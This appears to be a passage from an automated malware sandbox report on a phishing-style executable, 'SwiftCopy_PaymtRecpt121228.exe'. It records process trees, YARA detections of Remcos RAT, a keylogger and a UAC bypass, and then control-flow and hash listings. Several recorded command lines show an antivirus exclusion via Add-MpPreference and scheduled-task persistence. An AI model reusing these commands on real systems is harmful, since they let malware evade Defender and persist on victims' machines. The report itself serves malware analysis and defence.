                                                  Start time:10:37:01
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"
                                                  Imagebase:0x6a0000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
                                                  Imagebase:0xe0000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
                                                  Imagebase:0xa00000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:10:37:03
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff6ef0c0000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:10:37:04
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  Imagebase:0x7d0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 34%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:10:37:06
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"
                                                  Imagebase:0xe0000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:10:37:06
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:10:37:06
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\eaJOpx.exe"
                                                  Imagebase:0x4f0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:10:40:19
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"
                                                  Imagebase:0x660000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:10:40:19
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
                                                  Imagebase:0xc0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:10:40:19
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
                                                  Imagebase:0x470000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:10:40:20
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"
                                                  Imagebase:0xb10000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:12.8%
                                                    Dynamic/Decrypted Code Coverage:98.8%
                                                    Signature Coverage:1.2%
                                                    Total number of Nodes:259
                                                    Total number of Limit Nodes:9

                                                    Control-flow Graph

                                                    Function entry 6ef8ac9 (basic blocks 6ef8a74 to 6ef8f22). The block at 6ef8b54-6ef8b92 calls 6ef90d0; the block at 6ef8bbd is a switch-style dispatcher fanning out to over twenty short blocks that all return to 6ef8b9f-6ef8bbb. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ry$ry$ry
                                                    • API String ID: 0-128149707
                                                    • Opcode ID: eecd954c1d2e35864ac6f2eb86cd7e38668e459a24e047f57414ef4d7bcd561f
                                                    • Instruction ID: 06cf157b4c47144cc45c2b92b42908397c07e524b52dc8fbc4041964a865e338
                                                    • Opcode Fuzzy Hash: eecd954c1d2e35864ac6f2eb86cd7e38668e459a24e047f57414ef4d7bcd561f
                                                    • Instruction Fuzzy Hash: B8E1AC74E1630ADFDB44DFA6C8408EFBBB2FF89351B109569E501AB248D7359A42CF90

                                                    Control-flow Graph

                                                    Function entry 6ef654d (basic blocks 6ef654d to 6ef68a2). The block at 6ef666c dispatches to a dozen short blocks that return to 6ef664e-6ef666a; 6ef66b7-6ef66bf calls 6ef7271, and the call at 6ef6892 resolves to 6ef7f7b, 6ef7cab, 6ef8918 or 6ef8967. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$Te]q$z^I
                                                    • API String ID: 0-3923789156
                                                    • Opcode ID: 2b3499ba9fa59f4e101057a1190d1ad94d7fb664874e18587a4db5dc78aa8398
                                                    • Instruction ID: 5cee6ce231fc748e18eb5e181084bdf9c29402ecdd798aba5b296adb38479baa
                                                    • Opcode Fuzzy Hash: 2b3499ba9fa59f4e101057a1190d1ad94d7fb664874e18587a4db5dc78aa8398
                                                    • Instruction Fuzzy Hash: 5FB16C74E152099FDB44CFAAC8809EEFBF2FF89340F14942AE515AB254DB319901CFA0

                                                    Control-flow Graph

                                                    Function entry 6ef8b28 (basic blocks 6ef8b28 to 6ef8f22), a second entry into the same body as 6ef8ac9: 6ef8b54-6ef8b92 calls 6ef90d0 and the dispatcher at 6ef8bbd fans out to the same handler blocks. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ry$ry$ry
                                                    • API String ID: 0-128149707
                                                    • Opcode ID: 490b8875f2ff11265d1ba874fc25c3593e4b881d9787995616ad6d1b8640a184
                                                    • Instruction ID: fdaf6f4ca7deb170c9de4c89bcb243fa5aaa88667dc39c7abd0f3eeae9315250
                                                    • Opcode Fuzzy Hash: 490b8875f2ff11265d1ba874fc25c3593e4b881d9787995616ad6d1b8640a184
                                                    • Instruction Fuzzy Hash: 23C169B4E1530ADFDB44CF95C4858AEFBB2FF88311B10A955D601AB358D734AA82CF94

                                                    Control-flow Graph

                                                    Function entry 6ef6521 (basic blocks 6ef6521 to 6ef68a2), sharing its body with 6ef654d: the dispatcher at 6ef666c, the call to 6ef7271 at 6ef66b7-6ef66bf, and the call at 6ef6892 resolving to 6ef7f7b, 6ef7cab, 6ef8918 or 6ef8967. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$Te]q$z^I
                                                    • API String ID: 0-3923789156
                                                    • Opcode ID: 362df6ae05607c70272e5077385d93acf8b0840e323d2eb3990169579da4e166
                                                    • Instruction ID: b7ebb74fdcd1c9125b8269cb5378f991992f3cbe5d32cc360edcad0a1465436b
                                                    • Opcode Fuzzy Hash: 362df6ae05607c70272e5077385d93acf8b0840e323d2eb3990169579da4e166
                                                    • Instruction Fuzzy Hash: EEA12874E152099FDB44CFAAC8809EEFBF2EF89310F24942AE515BB254DB359901CF60

                                                    Control-flow Graph

                                                    Function entry 6ef65c0 (basic blocks 6ef65c0 to 6ef68a2), a third entry into the 6ef654d body: same dispatcher at 6ef666c, call to 6ef7271, and call at 6ef6892 resolving to 6ef7f7b, 6ef7cab, 6ef8918 or 6ef8967. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$Te]q$z^I
                                                    • API String ID: 0-3923789156
                                                    • Opcode ID: faf3fca01eb7fbfb788a6ea2cb1ad92ac1f089ad53cec8f26bf7fc3d024dea2f
                                                    • Instruction ID: f843e83888ae2fa42d3503c1e390458d53d5ea97358b58204b5597d2979c0ced
                                                    • Opcode Fuzzy Hash: faf3fca01eb7fbfb788a6ea2cb1ad92ac1f089ad53cec8f26bf7fc3d024dea2f
                                                    • Instruction Fuzzy Hash: 1891D374E102198FDB48CFAAC984ADDFBB2FF89310F24942AE515BB264D7349905CF54

                                                    Control-flow Graph

                                                    Function entry 6eff408 (basic blocks 6eff408 to 6eff718). The block at 6eff49b dispatches to about twenty short blocks that return to 6eff47d-6eff499; the call at 6eff54d resolves to 6ef6a3c or 6eff858. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TuA$UC;"
                                                    • API String ID: 0-2071649361
                                                    • Opcode ID: 2dc262b582afb8c2c2472cb99d3fe769f1684293a152553918f241355d3c4165
                                                    • Instruction ID: e5c5a2ab94c30b169e83d107fc2e494a5094d4f0dc4427cf6885da1372654dd6
                                                    • Opcode Fuzzy Hash: 2dc262b582afb8c2c2472cb99d3fe769f1684293a152553918f241355d3c4165
                                                    • Instruction Fuzzy Hash: 8C911971D25309DFDB48CFA6E5805DEFBB2EF89310F10A52AE515A7268E7309942CF50

                                                    Control-flow Graph

                                                    Function entry 6eff418 (basic blocks 6eff418 to 6eff718), a second entry into the 6eff408 body: same dispatcher at 6eff49b and the call at 6eff54d resolving to 6ef6a3c or 6eff858. No Windows API calls appear in this graph.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TuA$UC;"
                                                    • API String ID: 0-2071649361
                                                    • Opcode ID: 9b402fb69737b53e9e99112d1781ab71388419865fa6e45e07be36da63131dc4
                                                    • Instruction ID: a05f3121e5169b1563534f027cfb2a0bb8e20ccb5f10ed3d3589bc60efea81e0
                                                    • Opcode Fuzzy Hash: 9b402fb69737b53e9e99112d1781ab71388419865fa6e45e07be36da63131dc4
                                                    • Instruction Fuzzy Hash: 9F911871D24309EFDB48CFA6E5805DEFBB2EF89350F10A52AE515A7268E7309942CF50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: {#L
                                                    • API String ID: 0-1361971085
                                                    • Opcode ID: 26d41cd44cdbb376dcd4190a136b15d385c8a1827826d5a5e3a1d1bbe3d7fce4
                                                    • Instruction ID: dc041844060cfabd32e9356b83012a65db2e73d345ee55bbd940a33c825b9dcf
                                                    • Opcode Fuzzy Hash: 26d41cd44cdbb376dcd4190a136b15d385c8a1827826d5a5e3a1d1bbe3d7fce4
                                                    • Instruction Fuzzy Hash: C9D11771E05219DFDB58CFAAC58059EFBF2BF89340F14D52AD41AAB228DB309942CF50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: {#L
                                                    • API String ID: 0-1361971085
                                                    • Opcode ID: 58aa03eeff0af46e414bc68622f7ab2f6a2cb6488198818de46de1b3869188b1
                                                    • Instruction ID: bb9d354ecdee0a4aa476f9eafd54c4ce88aad81cd460ce7da45872a5f02b5952
                                                    • Opcode Fuzzy Hash: 58aa03eeff0af46e414bc68622f7ab2f6a2cb6488198818de46de1b3869188b1
                                                    • Instruction Fuzzy Hash: 74D11771E05219DFDB58CFAAC98059EFBF2BF89340F14D52AD519AB228DB309942CF50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Yzl
                                                    • API String ID: 0-3906699567
                                                    • Opcode ID: 4becedfbbbd74954fc1f3a086b27e253e4095c31d72d2e837de261a02a570511
                                                    • Instruction ID: ee23da6e8ca9c6246c1e457549d58a6a5aa2109f9ed0217b026c9419cdd7af2e
                                                    • Opcode Fuzzy Hash: 4becedfbbbd74954fc1f3a086b27e253e4095c31d72d2e837de261a02a570511
                                                    • Instruction Fuzzy Hash: 6B91D5B4E00219CFDB54DFA9D994A9EBBB2FF88304F1085A9D419AB365DB309D46CF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Yzl
                                                    • API String ID: 0-3906699567
                                                    • Opcode ID: 860b2d5c082ae8977dc4ae9927ce8e66b23ae9fa7fb3ea801fa6de90321278cd
                                                    • Instruction ID: 247d7b77309d5a545157db692d638eb4dbbc2ac58e35136c8f2b3756acf3261b
                                                    • Opcode Fuzzy Hash: 860b2d5c082ae8977dc4ae9927ce8e66b23ae9fa7fb3ea801fa6de90321278cd
                                                    • Instruction Fuzzy Hash: 2391D574E00219CFDB58DFA9D994A9DBBB2FF88304F1085A9D419AB365DB309D46CF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: iUfo
                                                    • API String ID: 0-3820436262
                                                    • Opcode ID: e55f3ba94abed96dfa31357e8b46e1025bdbe0b6dffed6067fade994c0384a6d
                                                    • Instruction ID: 8843918b40a5f1e90014d7ac40ad4c447ad7a24eeb41d36bbacf1ef10279eaed
                                                    • Opcode Fuzzy Hash: e55f3ba94abed96dfa31357e8b46e1025bdbe0b6dffed6067fade994c0384a6d
                                                    • Instruction Fuzzy Hash: 957124B4E15219AFCB54CFA9D9455EDFBB2FF88300F10946AE505A7264E734AA028F90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 5=6
                                                    • API String ID: 0-2897083178
                                                    • Opcode ID: 978a312c7558c5af340e1288ca3097243f82d814917c68575ca97207d8cbe5e4
                                                    • Instruction ID: 3141782684821400d76822a3f0565e4b12eab97fca6811953d7be9bd896bce01
                                                    • Opcode Fuzzy Hash: 978a312c7558c5af340e1288ca3097243f82d814917c68575ca97207d8cbe5e4
                                                    • Instruction Fuzzy Hash: EB715874E1530A9FCB44CFA5D9415EEFFB2FF89300B10A92AD115E7264DB349A028F90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 5=6
                                                    • API String ID: 0-2897083178
                                                    • Opcode ID: 815a53c05a664f030c2fc0044786ed63b01784474c6d089f1ddb818819927624
                                                    • Instruction ID: 1f567192f2d4587fc43c970f3fd007b355841eee9bd339c78335e68345fea68d
                                                    • Opcode Fuzzy Hash: 815a53c05a664f030c2fc0044786ed63b01784474c6d089f1ddb818819927624
                                                    • Instruction Fuzzy Hash: 73613774E1530A9FDB44CFA5D9415EEFFB2FF89200B10A52AD116E7214DB349A028F94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: iUfo
                                                    • API String ID: 0-3820436262
                                                    • Opcode ID: ae987c41076cc8a39ac0ac41017bab645fd586dff7e55c59333b5b75f4b0ad94
                                                    • Instruction ID: 4da0630000c27c77cc75c45aabe10eb4ae4eeca5bae08773464a0bad6b96bc88
                                                    • Opcode Fuzzy Hash: ae987c41076cc8a39ac0ac41017bab645fd586dff7e55c59333b5b75f4b0ad94
                                                    • Instruction Fuzzy Hash: A45114B4E152199FDB54CFA9D4455EEFBB2FF88300F10902AE505B7264EB346A42CF94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -2m
                                                    • API String ID: 0-2686427999
                                                    • Opcode ID: 9da059d31507179c8018b0b26c215840afe04a74bfbbaee3983d983f7cb0dabb
                                                    • Instruction ID: b663b1b4ef3f5b674773490c0e5369f60999b167800d168658efb324f2d9355d
                                                    • Opcode Fuzzy Hash: 9da059d31507179c8018b0b26c215840afe04a74bfbbaee3983d983f7cb0dabb
                                                    • Instruction Fuzzy Hash: C25138B0E152099FDB48CFAAD4445EEFBF2EF88300F24E06AD919A7254D7345A41CFA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4065f735436c30ebfa5e501ce3561b1761709f78354b80f72b631a5c976de5ed
                                                    • Instruction ID: bbfc53598a9f343a16e1fb7d184877918c63d56fb8d11827f77e92838644332d
                                                    • Opcode Fuzzy Hash: 4065f735436c30ebfa5e501ce3561b1761709f78354b80f72b631a5c976de5ed
                                                    • Instruction Fuzzy Hash: AB329C30B022148FDB64EB69C990BAEBBF6AFC9300F144469E54ADB7A4DB34DD05CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7d641d98bbddc55b7d0fc200b0407dc9b8be7d00d2da444deecf5ac071808ae
                                                    • Instruction ID: 897f25cb92ceeca19aecbba886897458122ebe958e4bf2863917b51308eaf4b1
                                                    • Opcode Fuzzy Hash: a7d641d98bbddc55b7d0fc200b0407dc9b8be7d00d2da444deecf5ac071808ae
                                                    • Instruction Fuzzy Hash: DAB14971D0A2099FDB58DFAAC94069EFFB2FF89300F20D46AD515A7255DB349A02CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 588c49ed7aa67f21d23c862133542885ca2f3567eb844ed752f81289839830fb
                                                    • Instruction ID: 1e4be3402feb653aa8258133935789992a76f607e47ec0ee470bf1501f4287f7
